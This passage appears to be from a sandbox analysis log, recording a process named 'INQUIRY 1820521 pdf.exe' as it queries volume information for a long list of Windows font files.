Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
